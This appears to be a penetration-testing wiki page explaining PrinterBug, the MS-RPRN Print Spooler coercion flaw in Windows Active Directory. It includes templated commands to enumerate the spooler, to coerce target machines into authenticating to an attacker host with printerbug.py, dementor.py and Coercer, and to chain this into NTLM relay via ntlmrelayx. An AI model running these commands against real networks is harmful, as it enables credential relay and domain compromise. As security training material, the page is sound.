# MS-RPRN abuse (PrinterBug)

## Theory

Microsoft’s Print Spooler is a service handling the print jobs and other various tasks related to printing. An attacker controling a domain user/computer can, with a specific RPC call, trigger the spooler service of a target running it and make it authenticate to a target of the attacker's choosing. This flaw is a "won't fix" and enabled by default on all Windows environments ([more info on the finding](https://fr.slideshare.net/harmj0y/derbycon-the-unintended-risks-of-trusting-active-directory/47)).

**The coerced authentications are made over SMB**. But MS-RPRN abuse can be combined with [WebClient abuse](https://red.infiltr8.io/ad/movement/mitm-and-coerced-authentications/webclient) to elicit incoming authentications made over HTTP which heightens [NTLM relay](https://red.infiltr8.io/ad/movement/ntlm/relay) capabilities.

The "specific call" mentioned above is the `RpcRemoteFindFirstPrinterChangeNotificationEx` notification method, which is part of the MS-RPRN protocol. MS-RPRN is Microsoft’s Print System Remote Protocol. It defines the communication of print job processing and print system management between a print client and a print server.

{% hint style="info" %}
The attacker needs a foothold on the domain (i.e. compromised account) for this attack to work since the coercion is operated through an RPC call in the SMB `\pipe\spoolss` named pipe through the `IPC$` share.
{% endhint %}

## Practice

Remotely checking if the spooler is available can be done with [SpoolerScanner](https://github.com/vletoux/SpoolerScanner) (Powershell) or with [rpcdump](https://github.com/SecureAuthCorp/impacket/blob/master/examples/rpcdump.py) (Python).

The spooler service can be triggered with [printerbug](https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py) or [SpoolSample](https://github.com/leechristensen/SpoolSample) (C#). There are many alternatives available publicly on the Internet.

{% tabs %}
{% tab title="Enumerate" %}
**rpcdump**

We can check if the spooler service is available on a target using [rpcdump.py](https://github.com/fortra/impacket/blob/master/examples/rpcdump.py) from impacket.

```bash
rpcdump.py $TARGET | grep -A 6 "spoolsv"
```

**NetExec**

[NetExec](https://github.com/Pennyw0rth/NetExec) (Python) can be used to check if the spooler service is running.

```bash
netexec smb <TARGET> -u <USER> -p <PASSWORD> -M spooler
netexec smb <TARGET> -u <USER> -p <PASSWORD> --local-auth -M spooler
```

**SpoolerScanner**

Check if the spooler service is available (Windows) using [SpoolerScanner](https://github.com/vletoux/SpoolerScanner) (Powershell)

```powershell
.\SpoolerScan.ps1
```

{% endtab %}

{% tab title="Exploit" %}
**PrinterBug**

Using [printerbug](https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py) (python) we can trigger the spooler to authenticate against our cotrolled server.

```bash
printerbug.py 'DOMAIN'/'USER':'PASSWORD'@'TARGET' 'ATTACKER HOST'
```

**Dementor**

Using [dementor](https://github.com/NotMedic/NetNTLMtoSilverTicket/blob/master/dementor.py) (python) we can trigger the spooler to authenticate against our cotrolled server.

```bash
python dementor.py -d $DOMAIN -u $USERNAME -p $PASSWORD $ATTACKER_IP $TARGET_IP
```

**Coercer**

Yet another alternative is to use the [Coercer](https://github.com/p0dalirius/Coercer/tree/master) tool (python) as follow.

```bash
# Coerce
coercer coerce -u $USER -p $PASSWORD -d $DOMAIN --filter-protocol-name MS-RPRN -l $ATTACKER_IP -t $TARGET_IP

# Coerce a specific method
coercer coerce -u $USER -p $PASSWORD -d $DOMAIN --filter-method-name RpcRemoteFindFirstPrinterChangeNotificationEx -l $ATTACKER_IP -t $TARGET_IP
```

{% endtab %}

{% tab title="ntlmrelayx" %}
In the situation where the tester doesn't have any credentials, it is still possible to [relay an authentication](https://red.infiltr8.io/ad/movement/ntlm/relay) and trigger the spooler service of a target via a SOCKS proxy.

```bash
ntlmrelayx.py -t smb://$TARGET -socks
proxychains printerbug.py -no-pass 'DOMAIN'/'USER'@'TARGET' 'ATTACKER HOST'
```

{% endtab %}
{% endtabs %}

{% hint style="info" %}
**Nota bene**: coerced NTLM authentications made over SMB restrict the possibilites of [NTLM relay](https://red.infiltr8.io/ad/movement/ntlm/relay). For instance, an "unsigning cross-protocols relay attack" from SMB to LDAP will only be possible if the target is vulnerable to CVE-2019-1040 or CVE-2019-1166.
{% endhint %}

## Resources

{% embed url="<https://www.harmj0y.net/blog/redteaming/not-a-security-boundary-breaking-forest-trusts/>" %}